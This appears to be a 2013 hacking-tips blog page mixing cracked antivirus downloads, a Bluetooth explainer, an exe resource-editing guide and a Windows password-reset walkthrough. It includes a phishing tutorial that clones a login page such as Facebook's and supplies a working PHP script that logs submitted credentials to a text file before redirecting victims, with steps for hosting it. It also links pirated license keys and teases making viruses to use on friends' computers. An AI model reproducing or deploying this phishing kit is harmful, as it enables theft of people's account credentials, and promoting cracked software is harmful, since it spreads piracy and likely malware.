Download Microsoft office 2013 Now!

Microsoft has just released the free preview version of the all new Microsoft Office 2013. You can now download Microsoft Office 2013 immediately on your computer to try it.

How to Access Blocked Websites Without Proxy

Access your favorite blocked website and social networking sites at your or college or your workplace without proxy.Download exciting software to access blocked websites.

Make a Very Dangerous Virus with Notepad

Now make your own viruses in Notepad. Make fun with these in your friends computer.

How to remove PDF password

In some PDF files, Owner set the password to that file. It restrict the print, copy or edit the content of PDF file. In such situation PDF password remover application help you to remove password.

How to bypass Surveys on websites

Many websites makes survey to proceed the download or to visit the website. These surveys prove to b headache. To bypass these surveys, there are some tricks to follow.

Wednesday 20 February 2013

Avast! Free Antivirus 8.0.1475.10 Full Crack Patch

Avast! Free Antivirus 8.0.1475.10 Full version - avast! free Antivirus software provides complete virus protection for your computer. Antivirus engine is complemented by anti-spyware, firewall and antispam modules to protect you against phishing schemes, identity theft and internet-distributed web viruses. Automatic updates for greater user convenience and safety. Top user ratings among free antivirus software. The new avast! Free Antivirus includes a spyware detection engine. To protect you from identity theft as well as viruses. avast! Pro Antivirus better protection during web surfing. Full-featured antivirus software. Better than our free antivirus, especially for web surfing, but without the firewall and antispam included in avast! Internet Security. Also if you wish to customize your security, this is the recommended software.


Works on Microsoft Windows 2003, Windows XP, Vista, Windows 7, Windows 8 (32/64 bit).


Download Links :

  1. avast! Free Antivirus 8.0.1475.10 Beta.rar
  2. License Key avast! Free Antivirus until 2038.rar
Enjoy with avast! Antivirus till 2038.

AVG Internet Security 2013 13.0 x86 x64 Full Crack

AVG Internet Security 2013 13.0 32 64 bit Full Crack Patch - AVG Internet Security 2013 13.0 x64 Full version is to complete protection for everything you do! With AVG Internet Security, our most advanced protection, you get a worry-free online experience every time. This award-winning product gives you unbeatable Internet security by protecting against viruses, spyware, hackers, spam and malicious websites. AVG Internet Security is a reliable and easy-to-use solution for home and small office users which is trusted by millions of users worldwide. AVG Internet Security's multiple layers of protection mean you don't have to worry about identity theft, spam or viruses. And it'll even prevent you from accidentally visiting harmful sites. It's faster, smarter security that won't slow your computer down. With AVG Internet Security you also have access for the first time to AVG Identity Theft Recovery Unit that will help you get your life back in order if you ever become a victim of identity theft – online or offline.



Download Links :

  1. AVG Antivirus (32-bit)
  2. AVG Antivirus (64-bit)
Enjoy with full cracked AVG antivirus.

Kaspersky Anti Virus 2013 13.0.1.4190 Full Crack

Kaspersky Anti Virus 2013 13.0.1.4190 Full Crack Patch - Kaspersky Anti-Virus combines reactive antivirus and spyware detection methods with the latest proactive technologies to provide your computer with the most effective protection against malicious programs. The product is simple to install and set up, while offering advanced users a range of versatile settings for fine-tuning the program.


Download Links :


  1. Kaspersky Anti Virus
  2. Kaspersky Pure
  3. Kaspersky Internet Security
  4. Crack


Tuesday 19 February 2013

Bluetooth

Bluetooth is a wireless technology standard for exchanging data over short distances (using short-wavelength radio transmissions in the ISM band from 2400–2480 MHz) from fixed and mobile devices, creating personal area networks (PANs) with high levels of security. Created by telecom vendor Ericsson in 1994, it was originally conceived as a wireless alternative to RS-232 data cables. It can connect several devices, overcoming problems of synchronization.

Now explore the some knowledge of Bluetooth :-

TABLE OF CONTENTS:

  1. Bluetooth Technology
  2. Applications
  3. Working
  4. History
  5. Latest Research, Facts and Problems

5. Latest Reseach, Facts and Problems in Bluetooth


Latest Research
A lot of research is currently underway to harness the power of Bluetooth technology in the healthcare domain. With the help of Bluetooth, health conscious individuals will have access to wireless devices to record information pertaining to body temperature, pressure count and metabolism. The Bluetooth enabled devices will first collect vital information with the patients and then share it with a doctor via a mobile phone or PC.
Compatible mobile phones will be better equipped with new dual-mode chips that support both traditional Bluetooth technology and other low-energy applications.
The low energy communicates with lightweight health sensors, while the traditional Bluetooth specification continues to operate with existing Bluetooth-enabled products such as hands-free headsets. This enables cell phone manufacturers to add dual-mode capabilities without significant increase in product pricing.


Interesting Facts
·         Renowned Andretti Green Racing team communicated during the race using Bluetooth devices.
·         Surveys show that 1/3rd of all new cars in the world will have Bluetooth capability.
·         Bluetooth-enabled medical equipment is presently being manufactured to be deployed at hospitals.
·         Bluetooth lets you watch video files or pictures on your TV screen. This is possible by using a laptop as a source to relay the media files.


Problems Faced
Just like any other technology, Bluetooth does have certain issues regarding its use.
For two Bluetooth-enabled devices to function in tandem, they should be provided with the same profile. For example, to connect a mobile phone to your headset, you will need matching profiles in both devices. In this scenario, a hand free is the correct profile. Similarly, a basic printing profile will be required if you want to print a document on your phone through a Bluetooth-enabled printer. You will have to keep ensuring that profiles match for smooth functioning of your Bluetooth devices.
To ensure that two Bluetooth devices work together, they have to be paired. Pairing would require both devices exchanging passkeys. Once paired, all data sent between the two devices gets encrypted, meaning that any device that is not paired with the other two is unable to translate the data. Pairing between two devices may fail and the most frequent reason for this is the usage of wrong password.
As the technology advances, more issues pertaining to Bluetooth are bound to pop up. Luckily, most issues are easy to deal with.

<< 4. History of Bluetooth                                                                                                                        Go to Index

4. History of Bluetooth

History
Bluetooth was developed by Ericsson which is a Danish company. It was developed in 1994, but only in 1998 Ericsson presented it to several other big companies, and they agreed to make it an industry standard.
Bluetooth, the protocol that promised to connect all your different gadgets from different companies/makers, is named Bluetooth after a Viking King called Harald Bluetooth, who got his name because of his fondness for blueberries, which stained his teeth. King Harald Bluetooth was famous for uniting the warring tribes of Scandinavia, just like our Bluetooth Protocol, uniting different technologies.
1998
·         The birth of Bluetooth with the formation of Bluetooth Special Interest Group (SIG).
·         Bluetooth is officially adopted as the name for the technology.
1999
·         1.0 Specification is officially released.
·         Bluetooth is declared the "Best of Show Technology Award" by COMDEX.
2000
·         For the first time, Bluetooth-enabled mobile phone, PC card, mouse, headset and laptop are unveiled.
·         USB dongle prototype unveiled at COMDEX.
2001
·         Bluetooth SIG Inc. is formed.
·         First hands-free car kit is launched.
2002
·         First GPS receiver and Bluetooth enabled digital camera.
·         IEEE approves 802.15.1 specification for Bluetooth technology.
2003
·         First Bluetooth-enabled MP3 player launched.
·         First FDA-approved Bluetooth-enabled medical system.
2004
·         Bluetooth SIG adopts Enhanced Data Rate (EDR).
·         Bluetooth technology embedded in 250 million devices.
·         First Bluetooth-enabled stereo headphones launched.
2006
·           Bluetooth is installed in 1 billion devices.

<< 3. Bluetooth Working                                                     5. Latest Research, Facts and Problems >>

3. How Bluetooth Technology Works

Working

Bluetooth technology was discovered to have wireless protocols to connect several electronic devices and as a solution to synchronize the data. The Bluetooth standard is maintained by the Bluetooth Special Interest Group.
At the physical layer, the Bluetooth RF transceiver is positioned. At around 79 Bluetooth channels are placed with a space of 1MHz. Transmission of data and voice are achievable at short distances and thereby creating Wireless PANs.
A Bluetooth device is comprised of an adapter. A Bluetooth adapter can be available in the form of a card to connect the device or integrated into an electronic device.
Link Management Protocol (LMP) is responsible for peer – to – peer message exchange when the electronic devices interfere in each other’s radio range. This layer creates the link and negotiation of packet size. If required this layer can perform the segmentation and reassembling of the packets.
The Bluetooth device enabled by the Service delivery protocol joins the piconet and enquires with all the services available. A piconet has a star topology with one master and seven slaves. The concept of Master and Slave is used in the Bluetooth technology. Only after the master takes the initial action, the devices can begin to talk. Bluetooth GloballD is exchanged among the electronic devices and a connection is build up after the profiles are matched.
Frequency hopping is used in the Bluetooth technology to avoid interfering with other signals. After the packet is transmitted or received, the Bluetooth signal hops to a new frequency. Each packet can cover five time slots.
The Bluetooth technology supports asynchronous data channel, or 3 simultaneous synchronous voice channels, or a channel which supports asynchronous data and synchronous voice.

<< 2. Applications                                                                                                             4. History of Bluetooth >>

2. Bluetooth Applications

The first and foremost application of Bluetooth technology would be to eradicate the tangling of cables that would mess up the room.

  1. Bluetooth’s biggest contribution is to provide a phone with a headset that works wirelessly. This is possible by providing the caller with an earpiece and a small microphone attached to the caller’s shirt. The mobile phone can be located in a bag or anywhere in the body. The caller can dial a number even without touching a button on the mobile phone. This technology has the advantage of eliminating the radiation hitting the cerebral region.
  2. PDA, PC or laptop which has enabled Bluetooth can communicate with each other and update with its latest information. This technology has helped in synchronizing the data easily.
  3. It is difficult to send emails while travelling in a flight. On landing of the flight, the Bluetooth enabled laptop can send the email only when it gets in touch with the user’s phone.
  4. Wireless mouse and keyboards are introduced.
  5. One will be alerted on his/her mobile phone when your laptop receives the mail.
  6. One will be alerted on his/her mobile phone when your laptop receives the mail.
<< 1. Bluetooth Technology                                                                                         3. How Bluetooth works >>

Monday 18 February 2013

1. Bluetooth Technology

What is Bluetooth?
      Bluetooth is a wireless technology used to transfer data between different electronic devices. The distance of data transmission is small in comparison to other modes of wireless communication. This technology eradicates the use of cords, cables, adapters and permits the electronic devices to communicate wirelessly among each other.  

The key features of Bluetooth technology:
  • Less complication
  • Less power consumption
  • Available at cheaper rates
  • Robustness

Bluetooth technology permits hands free headset for incoming voice calls, ability of printing and fax, and automatic synchronization of PDA.
Classification
Various types of Bluetooth technology are available in the markets which help the consumers to communicate wirelessly. The different types of Bluetooth devices are PC cards, radios, dongles, and headsets. Laptops and other Internet enabled equipments use Bluetooth technology such as wireless mouse and keyboard to communicate wirelessly. Music players like iPods, music phones, or other MP3 players make use of stereo headphones.

Go to Index                                                                                                      2. Bluetooth Applications >>

How to make a Phishing page


What is phishing page?

A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page.

How to create?

  • Visit the page that you want to clone.
  • Save it (CTRL+S) via your browser.
  • Choose save complete webpage while saving it via browser.
  • Give name index while saving. (Dont use other name!)
  • Save it to a folder.
  • Now, you should have one file named "index.htm" and a folder.
  • We have to edit index.htm file.
  • Edit it and search "action" without "". You will get something like this if you are creating fake page of facebook, action="https://www.facebook.com/login.php?login_attempt=1" method="post" , We have to edit this line only. Change https://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.

  • How to create login.php?

    Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php.

    Code:

    <?php
    header("Location: http://www.google.com");
    $handle = fopen("passes.txt", "a");
    foreach($_GET as $variable => $value)
    {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
     

    You have to change http://www.google.com to the site url that you are cloning, for example, change it to http://www.facebook.com/ if you are cloning facebook.

    Now, you have your phishing page.

Now, you upload the above two files, login.php and passes.txt on any free web hosting site 
(eg. www.my3gb.com).

How to modify *.exe files



Learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.

try to view it in hex you'll only get tons of crap you don't understand.

First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at http://www.users.on.net/johnson/resourcehacker/

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too


3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are

-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.

*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.

*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.

*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!

*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!

*Cursor group: Change the mouse cursors used in the program just like you would change the icon.

*Bitmap: View or change images in the programs easy!

*WAV:Change the sounds in the prog. with your own.


5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.


TIP: To change a window title, search for something like: CAPTION "edit this".

TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).

TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.

TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.

Sunday 17 February 2013

Forgot Windows Live Password in Windows 8


With Windows 8, you can sign in to your PC with a Windows Live account. This allows syncing and sharing personal data across multiple devices very easily. You might also be wondering, “How to log on the computer if I forgot my Windows Live password?” Well, here is a excellent hack for you.
With Password Recovery Bundle utility you can create a bootable password reset CD, and set your computer to boot from the CD and it enables you to reset forgotten Windows Live password which is stored on your local computer. After resetting, you will regain full access to your PC with a new password.
How to Reset Forgotten Windows Live Password in Windows 8?
  1. First you need to download Password Recovery Bundle program on another computer. After installing and running the program, click the Windows Password button, which allows you to create a bootable password reset disk in 3 steps. Insert a blank CD/DVD or USB drive into the computer and click Start Burn to create a bootdisk.
  2. Insert the password reset bootdisk you’ve created into your Windows 8 computer. Turn on the computer and hold down F2 or whatever the setup key is shown as during the initial boot screen. This should bring up the BIOS.
    In the BIOS look for the Boot Device Priority option, set CD/DVD as the 1st boot device if you want to boot from CD. You can either set Removable Device as the 1st boot device if you want to boot off USB drive. Save your changes.
  3. Restart the computer and now it will boot from the password reset bootdisk. After one or two minutes the bootdisk will launch the Reset Windows Password utility. Choose the local user account which is linked to your Windows Live ID, and then click Reset Password button. The program will set your Windows Live password toPassword123 instantly.

  4. Now remove the password reset bootdisk and restart the computer, you can then quickly sign in to Windows 8 using your Windows Live account and the new password: Password123.
Password Recovery Bundle could also reset forgotten login password in Windows 7/Vista/XP/2003/2000. It should be the first Windows password recovery program which supports the latest operating system Windows 8.

Search